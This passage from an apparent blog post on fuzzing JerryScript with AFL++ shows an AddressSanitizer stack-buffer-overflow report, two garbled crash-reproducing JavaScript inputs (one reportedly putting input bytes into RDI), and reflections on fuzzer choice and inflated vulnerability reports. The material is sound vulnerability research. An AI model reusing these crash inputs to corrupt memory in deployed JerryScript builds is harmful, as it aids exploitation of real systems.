    #7 0x558aff008764 in jerry_parse_common.lto_priv.0 (/storage/jsfuzz/jerry-asan+0x2e764) (BuildId: 85560800a62467c72ec57dc61008c1abe723d70b)
    #8 0x558aff0bf0bc in jerryx_source_parse_script (/storage/jsfuzz/jerry-asan+0xe50bc) (BuildId: 85560800a62467c72ec57dc61008c1abe723d70b)
    #9 0x558afeff6be3 in main (/storage/jsfuzz/jerry-asan+0x1cbe3) (BuildId: 85560800a62467c72ec57dc61008c1abe723d70b)
    #10 0x7f6b9da27674  (/usr/lib/libc.so.6+0x27674) (BuildId: 4fe011c94a88e8aeb6f2201b9eb369f42b4a1e9e)
    #11 0x7f6b9da27728 in __libc_start_main (/usr/lib/libc.so.6+0x27728) (BuildId: 4fe011c94a88e8aeb6f2201b9eb369f42b4a1e9e)
    #12 0x558afeff72e4 in _start (/storage/jsfuzz/jerry-asan+0x1d2e4) (BuildId: 85560800a62467c72ec57dc61008c1abe723d70b)

Address 0x7b6b9b700098 is located in stack of thread T0 at offset 152 in frame
    #0 0x558aff055ffe in parser_parse_source.lto_priv.0 (/storage/jsfuzz/jerry-asan+0x7bffe) (BuildId: 85560800a62467c72ec57dc61008c1abe723d70b)

  This frame has 6 object(s):
    [32, 33) 'flags' (line 2041)
    [48, 49) 'flags' (line 2063)
    [64, 80) 'branch' (line 2253)
    [96, 112) 'literal'
    [128, 152) 'scanner_info_end' (line 2115) <== Memory access at offset 152 overflows this variable
    [192, 792) 'context' (line 1988)
HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork
      (longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: stack-buffer-overflow (/storage/jsfuzz/jerry-asan+0x78c4c) (BuildId: 85560800a62467c72ec57dc61008c1abe723d70b) in scanner_create_variables
Shadow bytes around the buggy address:
  0x7b6b9b6ffe00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x7b6b9b6ffe80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x7b6b9b6fff00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x7b6b9b6fff80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x7b6b9b700000: f1 f1 f1 f1 01 f2 01 f2 00 00 f2 f2 f8 f8 f2 f2
=>0x7b6b9b700080: 00 00 00[f2]f2 f2 f2 f2 00 00 00 00 00 00 00 00
  0x7b6b9b700100: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x7b6b9b700180: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x7b6b9b700200: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x7b6b9b700280: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x7b6b9b700300: 00 00 00 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==1365920==ABORTING

这个输入是：

class MyError extends Error {7667111111111111111;;;;;;;static
 { throwased = true;
  d = trsert.s}.defeuse(resourcd = true;
 new MyError(); });
stack.defer(function () {});
assert.throws(MyError, functction (# {
 Csu 12), .defer(function41024448kTtrspose()&
});

还有一个输入会使得用于寄存器间接寻址的寄存器 RDI 地址值变为 RDI 0x646573610a20650a ('\ne \nased')，RDI 内容是输入本身的一部分。不过很有意思的是它并不会触发 Address Sanitizer。说明 ASAN 很可能会改变某些调用栈帧的内存布局。（我手动 trim 了一下，不然这个输入真的又长又难看。）

class MyE{7667;;667;;sta;7;;667;;s;;#;statTtra;sta;7;;667;;;;;;;;s;;#;statTtra;;';s;;#at;#;statTtra;;';s;;#atTtra;;#;;sta;;;
e 
ased = 
class{76671;
6
;
s;;;;;;;;;;static
ase
6
e 
ased = 
class{76671;
6
;
s;;;;;;;;;;static
ased6671;
6
e 
ased = 
class{76671;
6
;
s;;;;;;;;;;static
as}}}}|}}}Of(}}|}csleO}}}}|}}}Of}}|}02000(1167E0Y.u(3}}}}}}}}}PisleO}}}}|}}}Of}}|}02000(1167E000002000(11676cY.u(Pisle}}}}PisleO}}}}|}}}OfInfinityaa, new .u9PisleOaaaaa!pa}}}}}}PisleO}}}}|}}}Of

另外有很多与它相似的 crash inputs，可以很明显发现 JerryScript 对于 JS 类私有字段名的处理有很大问题。

总结

其实这是一次没什么意义的 fuzzing，fuzz 类似编译器的软件应该使用结构化的 fuzzer，而不是 AFL++ 这样基本依靠字节随机变异的 fuzzer，不然连语法检查都过不了很难进一步挖掘漏洞。之后我可能再尝试一下 fuzzilli，或者考虑自己手写一个 fuzzer（画大饼 ing）。

最近初入真实世界的二进制漏洞利用，看到了太多 AI 伪造 exploits 和毫无意义的“高危”CVE。各种漏洞挖掘有高到令人振奋的 bug bounty，但很少有组织愿意奖励 bug patches。这是否是安全研究与软件开发之间的脱节？（现实是许多开发者都反感这些夸张甚至虚假的漏洞报告。）